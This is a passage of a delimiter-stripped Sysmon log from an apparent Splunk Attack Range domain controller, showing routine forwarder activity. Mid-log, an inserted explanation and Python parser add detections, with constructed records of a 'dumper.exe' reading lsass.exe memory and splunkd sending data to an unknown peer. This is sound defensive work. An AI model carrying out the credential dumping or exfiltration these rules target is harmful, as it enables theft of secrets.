21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.789{4DB9351A-A2AA-60D3-1906-00000000CF01}2212C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.788{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=676A5D31D29072E3126831D41390DF8F,SHA256=7918AEFE08FE4E46EDA2BE37DB8E6263A89530256E451BF03069457319878916,IMPHASH=00000000000000000000000000000000falsetrue 
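The records in this export are Sysmon events whose field delimiters were stripped on the way out: each line is the event header (EventID, Version, Level, Task, Opcode, Keywords, RecordID, Channel, Computer, RuleName) fused directly to the EventData. What is here is forwarder housekeeping on a domain controller: Event 23 (FileDelete) for splunk-winevtlog.exe rewriting its WinEventLog checkpoint files, Event 3 for streamfwd.exe and splunkd.exe talking to 10.0.1.12 on 8000 and 8089, Event 1 for splunkd.exe spawning its modular inputs (splunk-MonitorNoHandle.exe, splunk-netmon.exe, splunk-admon.exe, splunk-powershell.exe), and Event 10 (ProcessAccess) where csrss.exe, conhost.exe and splunkd.exe open each new child with 0x1fffff (PROCESS_ALL_ACCESS) and svchost.exe opens sysmon64.exe with 0x1400 (query rights only). The parser below is an added example, not part of the export or of Splunk Attack Range: it recovers the field boundaries for Events 3, 10 and 23 using the Sysmon schema order and the fact that Sysmon's Task number equals its EventID, then runs two detections over the records. The sample input mixes lines copied from this page with three CONSTRUCTED ones (a hypothetical C:\Users\Public\dumper.exe opening lsass.exe with VM_READ, splunkd.exe connecting to 203.0.113.7, and a shortened copy of the svchost-to-sysmon64 access); the peer allow-list is an assumption drawn from the destinations seen here.

```python
"""Recover field boundaries in delimiter-stripped Sysmon records like the ones in
this export, then run two detections over them.  Added example, not part of the
log: field order follows the Sysmon schema for events 3, 10 and 23; the
allow-lists and the records marked CONSTRUCTED are assumptions."""
import re

# Header shared by every record: EventID Version Level Task Opcode Keywords
# RecordID Channel Computer RuleName UtcTime {ProcessGuid} ProcessId.  Sysmon sets
# Task == EventID, so the backreference makes the fused digit run unambiguous.
# RuleName is "-" in all records here; a non-empty one would fuse with Computer.
HEADER = re.compile(
    r"^(?P<event_id>\d+)(?P<version>\d)(?P<level>\d)(?P=event_id)(?P<opcode>\d)"
    r"(?P<keywords>0x[0-9A-Fa-f]{16})(?P<record_id>\d+)"
    r"(?P<channel>Microsoft-Windows-Sysmon/Operational)"
    r"(?P<computer>.+?)-(?P<utc>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})"
    r"\{(?P<guid>[0-9A-F-]{36})\}(?P<pid>\d+)(?P<body>.*)$", re.S)

BOOL = r"(?:true|false)"
EXE = r".+?\.exe"
IP = r"(?:\d{1,3}(?:\.\d{1,3}){3}|[0-9a-f]*:[0-9a-f:]*)"  # v4, or v6 up to a non-hex char
BODY = {
    # 3 NetworkConnect: Image User Protocol Initiated SrcIsIpv6 SrcIp SrcHostname
    # SrcPort SrcPortName DstIsIpv6 DstIp DstHostname DstPort DstPortName
    3: re.compile(
        rf"^(?P<image>{EXE})(?P<user>.+?)(?P<protocol>tcp|udp)(?P<initiated>{BOOL})"
        rf"(?P<src_v6>{BOOL})(?P<src_ip>{IP})(?P<src_host>.+?)(?P<src_port>\d+)"
        rf"(?P<src_port_name>[^0-9]*?)(?P<dst_v6>{BOOL})(?P<dst_ip>{IP})"
        r"(?P<dst_host>.+?)(?P<dst_port>\d+)(?P<dst_port_name>[^0-9]*)$"),
    # 10 ProcessAccess: SourceImage {TargetGuid} TargetPid TargetImage GrantedAccess
    # CallTrace.  The header pid is SourceProcessId+SourceThreadId fused (412528 is
    # 412/528) and cannot be split; GrantedAccess is hex, so cut it where the trace starts.
    10: re.compile(
        rf"^(?P<source_image>{EXE})\{{(?P<target_guid>[0-9A-F-]{{36}})\}}(?P<target_pid>\d+)"
        rf"(?P<target_image>{EXE})(?P<granted_access>0x[0-9a-f]+?)(?=[A-Za-z]:\\)"
        r"(?P<call_trace>.*)$", re.S),
    # 23 FileDelete: User Image TargetFilename Hashes IsExecutable Archived
    23: re.compile(
        rf"^(?P<user>.+?)(?P<image>[A-Za-z]:\\{EXE})(?P<target>[A-Za-z]:\\.+?)"
        rf"(?P<hashes>(?:[A-Z0-9]+=[0-9A-F]+,?)+)(?P<is_executable>{BOOL})(?P<archived>{BOOL})$"),
}
# Event 1 is left as a raw body on purpose: FileVersion, Description, Product and
# Company fuse into one run ("8.0.2Network monitorSplunk ApplicationSplunk Inc.").


def parse_record(line):
    """Split one fused record into header fields plus a per-event-type body dict."""
    m = HEADER.match(line.strip())
    if not m:
        raise ValueError("not a fused Sysmon record: %r" % line[:40])
    ev = m.groupdict()
    ev["event_id"], ev["record_id"] = int(ev["event_id"]), int(ev["record_id"])
    pat = BODY.get(ev["event_id"])
    bm = pat.match(ev["body"]) if pat else None
    ev["fields"] = bm.groupdict() if bm else {}
    return ev


PROCESS_VM_READ = 0x0010                   # right needed to read another process's memory
SENSITIVE = {"lsass.exe", "sysmon64.exe"}  # credential store and the sensor itself
FORWARDER = {"splunkd.exe", "streamfwd.exe"}
# Assumed: the only legitimate peers are the indexer/deployment server seen in the log.
FORWARDER_PEERS = {("10.0.1.12", "8000"), ("10.0.1.12", "8089")}


def base(path):
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev):
    """Return an alert string for one parsed record, or None."""
    f = ev["fields"]
    if ev["event_id"] == 10 and f:
        access = int(f["granted_access"], 16)
        if base(f["target_image"]) in SENSITIVE and access & PROCESS_VM_READ:
            return f"E10 {base(f['source_image'])} opened {base(f['target_image'])} with VM_READ (0x{access:x})"
    if ev["event_id"] == 3 and f and f["initiated"] == "true" and base(f["image"]) in FORWARDER:
        peer = (f["dst_ip"], f["dst_port"])
        if peer not in FORWARDER_PEERS:
            return f"E3 {base(f['image'])} sent telemetry to unexpected peer {peer[0]}:{peer[1]}"
    return None


def run_detections(lines):
    """Parse every line and collect alerts tagged with UtcTime and RecordID."""
    out = []
    for ev in map(parse_record, lines):
        hit = detect(ev)
        if hit:
            out.append(f"{ev['utc']} rec={ev['record_id']} {hit}")
    return out


SAMPLE_LINES = [
    # From the export: streamfwd.exe to the indexer, lsass.exe accepting loopback LDAP,
    # splunkd.exe deleting serverclass.xml, csrss.exe opening a freshly spawned child.
    r"354300x800000000000000024056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.162{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61471-false10.0.1.12-8000-",
    r"354300x800000000000000024107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61477-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap",
    r"23542300x800000000000000024068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.167{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue",
    r"10341000x800000000000000024089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.147{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2A9-60D3-1706-00000000CF01}5516C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f",
    # CONSTRUCTED, modelled on the export's svchost->sysmon64.exe records with the
    # call trace shortened: 0x1400 carries no VM_READ, so it must not alert.
    r"10341000x800000000000000024202Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.913{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\lsm.dll+fd18",
    # CONSTRUCTED: an unknown binary opening lsass.exe with VM_READ, and splunkd.exe
    # sending to a peer that is not the indexer (203.0.113.7 is a documentation address).
    r"10341000x800000000000000024203Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:01.000{4DB9351A-A2B0-60D3-2006-00000000CF01}55204100C:\Users\Public\dumper.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Users\Public\dumper.exe+1a2b",
    r"354300x800000000000000024204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:08:02.000{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61500-false203.0.113.7-8089-",
]

if __name__ == "__main__":
    for ev in map(parse_record, SAMPLE_LINES):
        print(ev["event_id"], ev["record_id"], {k: v for k, v in ev["fields"].items() if k != "call_trace"})
    print(*run_detections(SAMPLE_LINES), sep="\n")
```

Run as-is and the four page records parse cleanly with no alert, the svchost-to-sysmon64 record is silent because 0x1400 has no VM_READ bit, and only the two constructed records alert. Two limits are inherent to the fused format rather than the parser: SourceProcessId and SourceThreadId in Event 10 (and LogonId plus TerminalSessionId in Event 1) cannot be separated without a delimiter, and an IPv6 source address followed by a hostname that begins with a hex letter would absorb that letter, so treat parsed hostnames from such rows with care.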
10341000x800000000000000024108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.257{4DB9351A-A2A9-60D3-1806-00000000CF01}71123928C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000024107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61477-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 354300x800000000000000024106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:52.608{4DB9351A-9DEA-60D3-2B00-00000000CF01}3024C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local61477-true0:0:0:0:0:0:0:1win-dc-663.attackrange.local389ldap 10341000x800000000000000024105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:54.038{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:54.038{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:53.898{4DB9351A-A2A9-60D3-1806-00000000CF01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000024128Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.944{4DB9351A-A2AB-60D3-1A06-00000000CF01}51366824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024127Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.913{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=709182941BD75271D06A1CAB7255C9B7,SHA256=A1EFE32F1A662D70C8C59303255F153E6019D11EF95DF2F120098ACDA55812C5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024126Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A2AB-60D3-1A06-00000000CF01}5136C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024125Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024124Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:55.679{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024123Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
